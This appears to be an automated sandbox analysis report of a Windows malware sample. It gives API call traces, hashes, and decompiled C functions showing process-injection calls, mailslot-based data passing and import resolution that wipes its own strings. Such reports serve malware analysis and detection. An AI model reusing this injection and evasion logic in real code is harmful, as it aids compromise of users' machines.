  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:34C71A2B5584813A6BC94888E3669320
Total matches:36
Initial Analysis Report:Open
Initial sample Analysis ID:64003
Initial sample SHA 256:34CD6B92357754175CDC0BCA3CDA8C2AA439CDFBCC03683EE3B3D502E4C71151
Initial sample name:crypt_0001_1096b.exe

Similar Executed Functions

Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}


APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}


APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
